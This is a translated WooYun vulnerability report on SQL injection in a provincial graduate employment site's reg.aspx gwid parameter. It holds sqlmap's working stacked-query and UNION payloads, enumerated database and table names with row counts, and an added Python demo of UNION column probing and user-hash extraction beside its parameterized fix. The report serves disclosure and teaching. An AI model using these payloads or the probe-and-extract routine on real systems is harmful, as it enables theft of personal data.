Vulnerability summary

Defect ID: wooyun-2015-0144532

Title: SQL injection on a provincial graduate employment website, exploitable via UNION

Vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-10-05 20:02

Fixed: 2015-11-26 09:52

Published: 2015-11-26 09:52

Type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: handed to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2015-10-05: details sent to the vendor; awaiting the vendor's response
2015-10-12: vendor confirmed; details visible to the vendor only
2015-10-22: details disclosed to core white hats and domain experts
2015-11-01: details disclosed to regular white hats
2015-11-11: details disclosed to intern white hats
2015-11-26: details disclosed to the public

Brief description:

A provincial graduate employment website is vulnerable to SQL injection.

Detailed description:

http://**.**.**.**/reg.aspx?gwid=


Injectable parameter: gwid

sqlmap output (the UNION payload is shown on one line; it was wrapped in the original listing):

Parameter: gwid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: gwid=';WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: gwid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(120)+CHAR(107)+CHAR(113)+CHAR(90)+CHAR(80)+CHAR(101)+CHAR(84)+CHAR(112)+CHAR(88)+CHAR(109)+CHAR(85)+CHAR(105)+CHAR(80)+CHAR(113)+CHAR(106)+CHAR(106)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[15:11:36] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2012
[15:11:36] [INFO] fetching database names
[15:11:36] [INFO] the SQL query used returns 8 entries
[15:11:36] [INFO] resumed: "distribution"
[15:11:36] [INFO] resumed: "edu_jsgl"
[15:11:36] [INFO] resumed: "master"
[15:11:36] [INFO] resumed: "model"
[15:11:36] [INFO] resumed: "msdb"
[15:11:36] [INFO] resumed: "ReportServer"
[15:11:36] [INFO] resumed: "ReportServerTempDB"
[15:11:36] [INFO] resumed: "tempdb"
available databases [8]:
[*] distribution
[*] edu_jsgl
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
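The report shows only sqlmap's verdict: a time-based stacked query and a 16-column UNION on the gwid parameter of reg.aspx. The block below is an added example, not code from the report or from the affected site. It reproduces the mechanism in Python against an in-memory SQLite database: a lookup that concatenates gwid into SQL beside its parameterized replacement, the UNION column-count search sqlmap ran to arrive at 16 columns, and exfiltration of another table's rows through one of the NULL slots. The table layout, column names, user table and sample rows are assumptions. Two differences from the real target (ASP.NET on SQL Server 2012) matter here: SQLite concatenates strings with || rather than +, and Python's sqlite3 executes only one statement per call, so the ';WAITFOR DELAY' stacked-query probe cannot be shown in it; ADO.NET's SqlCommand does execute a multi-statement batch, which is why that second technique worked against the site.

```python
"""
Added example, not code from the WooYun report or from the affected site.
It reproduces the mechanism behind the gwid finding with an in-memory
SQLite database. The real target ran ASP.NET on SQL Server 2012; the table
layout, column names, the user table and the sample rows are assumptions.
"""
import sqlite3

# Assumption: the query behind reg.aspx?gwid= selects 16 columns, matching
# the "Generic UNION query (NULL) - 16 columns" that sqlmap reported.
NUM_COLS = 16
COLS = ["gwid", "title"] + [f"c{i}" for i in range(3, NUM_COLS + 1)]

# Sentinel in the same role as sqlmap's CHAR(113)+CHAR(122)+... chain:
# if it comes back in the result, the injected SELECT was executed.
MARKER = "qzxkq"


def make_db():
    """Constructed sample database: a 16-column position table plus a user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE positions ({', '.join(COLS)})")
    rows = [
        ["P001", "Junior engineer"] + [None] * (NUM_COLS - 2),
        ["P002", "Teacher"] + [None] * (NUM_COLS - 2),
    ]
    placeholders = ",".join("?" * NUM_COLS)
    conn.executemany(f"INSERT INTO positions VALUES ({placeholders})", rows)
    conn.execute("CREATE TABLE users (name, pwd_hash)")
    conn.execute("INSERT INTO users VALUES ('admin', 'deadbeef')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, gwid):
    """The defect class behind the finding: request input concatenated into SQL."""
    sql = f"SELECT * FROM positions WHERE gwid='{gwid}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, gwid):
    """The fix: a parameterized query. gwid is bound as data and never parsed as SQL."""
    return conn.execute("SELECT * FROM positions WHERE gwid=?", (gwid,)).fetchall()


def union_payload(ncols, pick, position):
    """Build the ' UNION ALL SELECT NULL,... shape sqlmap used, with `pick` in one slot.
    The trailing -- comments out the closing quote the application appends."""
    slots = ["NULL"] * ncols
    slots[position] = pick
    return "' UNION ALL SELECT " + ",".join(slots) + "--"


def probe_column_count(lookup, max_cols=32):
    """sqlmap's column-count search: widen the UNION until the engine accepts it
    and the marker shows up in the result. Returns None when no width works,
    which is what a parameterized query looks like from the outside."""
    for n in range(1, max_cols + 1):
        try:
            rows = lookup(union_payload(n, f"'{MARKER}'", 0))
        except sqlite3.OperationalError:
            continue  # column-count mismatch: the engine rejects the UNION
        if any(row[0] == MARKER for row in rows):
            return n
    return None


def exfiltrate(lookup, ncols, slot):
    """Use one NULL slot to pull rows from another table through the UNION.
    SQLite concatenates with ||; SQL Server would use +."""
    rows = lookup(union_payload(ncols, "(SELECT name||':'||pwd_hash FROM users)", slot))
    return [row[slot] for row in rows if row[slot] is not None]


if __name__ == "__main__":
    conn = make_db()
    vuln = lambda p: lookup_vulnerable(conn, p)
    safe = lambda p: lookup_safe(conn, p)
    print("concatenated query, column count:", probe_column_count(vuln))   # 16
    print("concatenated query, leaked:", exfiltrate(vuln, NUM_COLS, 8))    # ['admin:deadbeef']
    print("parameterized query, column count:", probe_column_count(safe))  # None
    print("parameterized query, leaked:", exfiltrate(safe, NUM_COLS, 8))   # []
```

The column-count loop is the part worth internalising: a UNION with the wrong width is a hard error, so an application that surfaces database errors, or simply returns different content for an accepted UNION, hands the attacker a yes/no oracle per width. The parameterized version gives the same empty answer at every width because the payload never reaches the parser as SQL.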

Proof of vulnerability (sqlmap table row counts):

Database: edu_jsgl
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.Table_Users_DLJL | 821521 |
| dbo.Table_Users_Attach | 91161 |
| dbo.XTWH_GZKZ_CZJL | 85409 |
| dbo.V_XTWH_GZKZ_SHJL | 59435 |
| dbo.XTWH_GZKZ_SHJL | 59435 |
| dbo.V_table_users_message | 43154 |
| dbo.table_confirm | 38336 |
| dbo.V_Table_Enroll2 | 38316 |
| dbo.V_wsbmgl | 38316 |
| dbo.View_1 | 38316 |
| dbo.table_examinfo | 27257 |
| dbo.table_scores | 27257 |
| dbo.V_Table_Scores | 27257 |
| dbo.bmbh_2014 | 21477 |
| dbo.a1 | 20243 |
| dbo.bmbh_2015 | 18073 |
| dbo.table_interview | 18053 |
| dbo.V_StaticAll | 15725 |
| dbo.Table_Users_CZJL | 13552 |
| dbo.table_recruit | 13120 |
| dbo.V_Table_recruit | 13120 |
| dbo.Table_Users_Limit | 11975 |
| dbo.Table_Zsrecruit | 11236 |
| dbo.V_Table_Zsrecruit | 11236 |
| dbo.Table_Users_Message | 9974 |
| dbo.Table_Enroll_DABH_XS | 7067 |
| dbo.table_health | 6444 |
| dbo.Table_Enroll_DABH_GX | 5496 |
| dbo.V_BmStatic | 5189 |
| dbo.V_BmStaticQrtj | 5189 |
| dbo.BM_SY | 4885 |
| dbo.Table_Normal | 4885 |
| dbo.Table_School | 4026 |
| dbo.Table_XZDM | 3678 |
| dbo.Sheet1$ | 3649 |
| dbo.Table_Major | 3450 |
| dbo.XTWH_GZKZ_DLJL | 3347 |
| dbo.V_Table_Position_XX | 2370 |
| dbo.V_Table_Position_CZ | 1041 |
| dbo.Table_Enroll_DABH_BTG | 722 |
| dbo.XTWH_QXWH_YHQX | 188 |
| dbo.V_yhqx | 187 |
| dbo.Table_Region | 146 |
| dbo.V_XTWH_QXWH_FZYH | 123 |
| dbo.XTWH_QXWH_FZYH | 123 |
| dbo.NewsData | 115 |
| dbo.V_NewsDataWithPath | 115 |
| dbo.sqlmapoutput | 114 |
| dbo.V_XTWH_QXWH_YHQX | 94 |
| dbo.V_NewsData_SH | 66 |
| dbo.V_XTWH_JCSJ_CSMC | 62 |
| dbo.XTWH_JCSJ_CSMC | 62 |
| dbo.XTWH_QXWH_FZQX | 54 |
| dbo.V_NewsData_BC | 49 |
| dbo.XTWH_QXWH_QXGL | 43 |
| dbo.V_XTWH_QXWH_BMGL | 28 |
| dbo.XTWH_QXWH_BMGL | 28 |
| dbo.Table_Enroll_Xk | 20 |
| dbo.NewsClass | 7 |
| dbo.V_NewsClass | 7 |
| dbo.Table_Advantage | 6 |
| dbo.XTWH_QXWH_FZGL | 6 |
| dbo.XTWH_JCSJ_CSLB | 5 |
| dbo.V_XTWH_QXWH_YHGL | 3 |
| dbo.V_XTWH_SJZD_BMSZ | 3 |
| dbo.V_yhgl | 3 |
| dbo.XTWH_QXWH_YHGL | 3 |
| dbo.table_alter | 2 |
| dbo.XTWH_SJZD_BMSZ | 2 |
| dbo.XTWH_SJZD_LBSZ | 2 |
| dbo.Announce | 1 |
+---------------------------+---------+


Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 231924 |
| sys.sysmessages | 231924 |
| sys.dm_os_memory_objects | 169792 |
| sys.dm_os_memory_cache_entries | 143367 |
| sys.syscacheobjects | 139705 |
| sys.dm_exec_cached_plans | 139348 |
| sys.dm_os_buffer_descriptors | 49833 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 13597 |
| sys.dm_os_ring_buffers | 11680 |
| sys.dm_os_virtual_address_dump | 11628 |
| sys.dm_exec_query_stats | 10949 |
| sys.all_columns | 7364 |
| sys.all_parameters | 7202 |
| sys.system_parameters | 7202 |
| sys.system_columns | 6582 |
| sys.dm_xe_object_columns | 6091 |
| sys.trace_subclass_values | 5444 |
| sys.trace_event_bindings | 4315 |
| sys.dm_xe_map_values | 3617 |
| sys.syscomments | 3091 |
| dbo.spt_values | 2515 |
| sys.all_objects | 2102 |
| sys.sysobjects | 2102 |
| sys.database_permissions | 2046 |
| sys.syspermissions | 2045 |
| sys.sysprotects | 2041 |
| sys.system_objects | 2013 |
| sys.all_sql_modules | 1866 |
| sys.system_sql_modules | 1863 |
| sys.dm_os_performance_counters | 1300 |
| sys.sysperfinfo | 1300 |
| sys.dm_xe_objects | 1143 |
| sys.system_internals_partition_columns | 946 |
| sys.columns | 782 |
| sys.dm_os_wait_stats | 649 |
| sys.dm_os_tasks | 588 |
| sys.dm_audit_actions | 507 |
| sys.stats_columns | 406 |
| sys.all_views | 403 |
| sys.system_views | 402 |
| sys.dm_exec_query_transformation_stats | 397 |
| sys.spatial_reference_systems | 391 |
| sys.event_notification_event_types | 380 |
| sys.dm_os_memory_cache_clock_hands | 374 |
| sys.dm_os_memory_clerks | 325 |
| sys.index_columns | 310 |
| sys.sysindexkeys | 310 |
| sys.trigger_event_types | 260 |
| sys.dm_db_missing_index_details | 239 |
| sys.dm_db_missing_index_group_stats | 239 |
| sys.dm_db_missing_index_groups | 239 |
| sys.sysindexes | 231 |
| sys.dm_db_index_usage_stats | 227 |
| sys.dm_os_spinlock_stats | 212 |
| sys.dm_os_threads | 188 |
| sys.trace_events | 180 |
| sys.dm_os_latch_stats | 157 |
| sys.dm_os_worker_local_storage | 157 |
| sys.dm_os_workers | 157 |
| sys.allocation_units | 147 |
| sys.dm_os_memory_cache_counters | 147 |
| sys.system_internals_allocation_units | 147 |
| sys.trace_xe_event_map | 138 |
| sys.dm_db_partition_stats | 133 |
| sys.indexes | 133 |
| sys.partitions | 133 |
| sys.system_internals_partitions | 133 |
| sys.syscharsets | 115 |
| sys.xml_schema_facets | 112 |
| sys.dm_server_registry | 111 |
| sys.dm_os_loaded_modules | 106 |
| sys.xml_schema_components | 100 |
| sys.objects | 89 |
| sys.dm_audit_class_type_map | 86 |
| sys.dm_os_memory_pools | 86 |
| sys.system_components_surface_area_configuration | 85 |
| sys.xml_schema_types | 82 |
| sys.configurations | 69 |
| sys.sysconfigures | 69 |
| sys.syscurconfigs | 69 |
| sys.trace_columns | 66 |
| sys.dm_os_memory_cache_hash_tables | 60 |
| sys.dm_exec_procedure_stats | 54 |
| sys.fulltext_languages | 53 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| sys.dm_exec_query_optimizer_info | 39 |
| sys.dm_db_session_space_usage | 38 |
| sys.dm_db_task_space_usage | 38 |
| sys.dm_exec_sessions | 38 |
| sys.sysprocesses | 38 |
| sys.dm_exec_requests | 35 |
| sys.syslanguages | 34 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.dm_os_schedulers | 33 |
| sys.server_permissions | 29 |
| sys.server_principals | 26 |
| sys.securable_classes | 25 |
| sys.dm_os_memory_node_access_stats | 24 |
| sys.server_event_session_events | 24 |
| sys.dm_xe_session_events | 23 |
| sys.dm_xe_session_object_columns | 22 |
| sys.trace_xe_action_map | 22 |
| sys.dm_os_waiting_tasks | 21 |
| sys.trace_categories | 21 |
| sys.dm_db_script_level | 19 |
| sys.dm_xe_session_event_actions | 19 |
| sys.server_event_session_actions | 19 |
| sys.xml_schema_component_placements | 19 |
| sys.database_principals | 18 |
| sys.sysaltfiles | 18 |
| sys.sysusers | 18 |
| sys.syslogins | 17 |
| sys.master_files | 16 |
| sys.xml_schema_attributes | 16 |
| INFORMATION_SCHEMA.SCHEMATA | 15 |
| sys.dm_logpool_hashentries | 15 |
| sys.schemas | 15 |
| sys.service_message_types | 14 |
| sys.dm_os_stacks | 13 |
| sys.server_event_session_fields | 11 |
| sys.service_contract_message_usages | 11 |
| sys.database_filestream_options | 9 |
| sys.dm_os_memory_brokers | 9 |
| sys.dm_xe_packages | 9 |
| sys.database_recovery_status | 8 |
| sys.databases | 8 |
| sys.sysdatabases | 8 |
| sys.certificates | 7 |
| sys.dm_tran_active_transactions | 7 |
| sys.dm_tran_database_transactions | 7 |
| sys.server_role_members | 7 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.crypt_properties | 6 |
| sys.service_contracts | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.dm_os_hosts | 5 |
| sys.endpoints | 5 |
| sys.tables | 5 |
| sys.dm_exec_connections | 4 |
| sys.dm_exec_query_resource_semaphores | 4 |
| sys.dm_tcp_listener_states | 4 |
| sys.dm_tran_locks | 4 |
| sys.internal_tables | 4 |
| sys.sql_logins | 4 |
| sys.syslockinfo | 4 |
| dbo.MSreplication_options | 3 |
| sys.assembly_types | 3 |
| sys.dm_broker_queue_monitors | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_os_memory_nodes | 3 |
| sys.dm_os_nodes | 3 |
| sys.dm_server_services | 3 |
| sys.dm_xe_session_targets | 3 |
| sys.identity_columns | 3 |
| sys.linked_logins | 3 |
| sys.login_token | 3 |
| sys.server_event_session_targets | 3 |
| sys.servers | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.sql_modules | 3 |
| sys.sysoledbusers | 3 |
| sys.sysservers | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| sys.database_files | 2 |
| sys.database_role_members | 2 |
| sys.dm_clr_tasks | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.dm_resource_governor_resource_pools | 2 |
| sys.dm_resource_governor_workload_groups | 2 |
| sys.dm_xe_sessions | 2 |
| sys.key_encryptions | 2 |
| sys.procedures | 2 |
| sys.resource_governor_resource_pools | 2 |
| sys.resource_governor_workload_groups | 2 |
| sys.server_event_sessions | 2 |
| sys.service_contract_usages | 2 |
| sys.sysfiles | 2 |
| sys.sysmembers | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| INFORMATION_SCHEMA.VIEWS | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.asymmetric_keys | 1 |
| sys.data_spaces | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_db_log_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_fts_fdhosts | 1 |
| sys.dm_io_pending_io_requests | 1 |
| sys.dm_logpool_stats | 1 |
| sys.dm_os_dispatcher_pools | 1 |
| sys.dm_os_dispatchers | 1 |
| sys.dm_os_memory_broker_clerks | 1 |
| sys.dm_os_process_memory | 1 |
| sys.dm_os_server_diagnostics_log_configurations | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_os_sys_memory | 1 |
| sys.dm_os_windows_info | 1 |
| sys.dm_resource_governor_configuration | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.filegroups | 1 |
| sys.remote_logins | 1 |
| sys.resource_governor_configuration | 1 |
| sys.routes | 1 |
| sys.symmetric_keys | 1 |
| sys.sysfilegroups | 1 |
| sys.sysremotelogins | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.views | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+


Remediation:

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 9

Confirmed: 2015-10-12 09:51

Vendor reply:

CNVD has confirmed the situation described; it has been forwarded via CNCERT to the Hunan branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet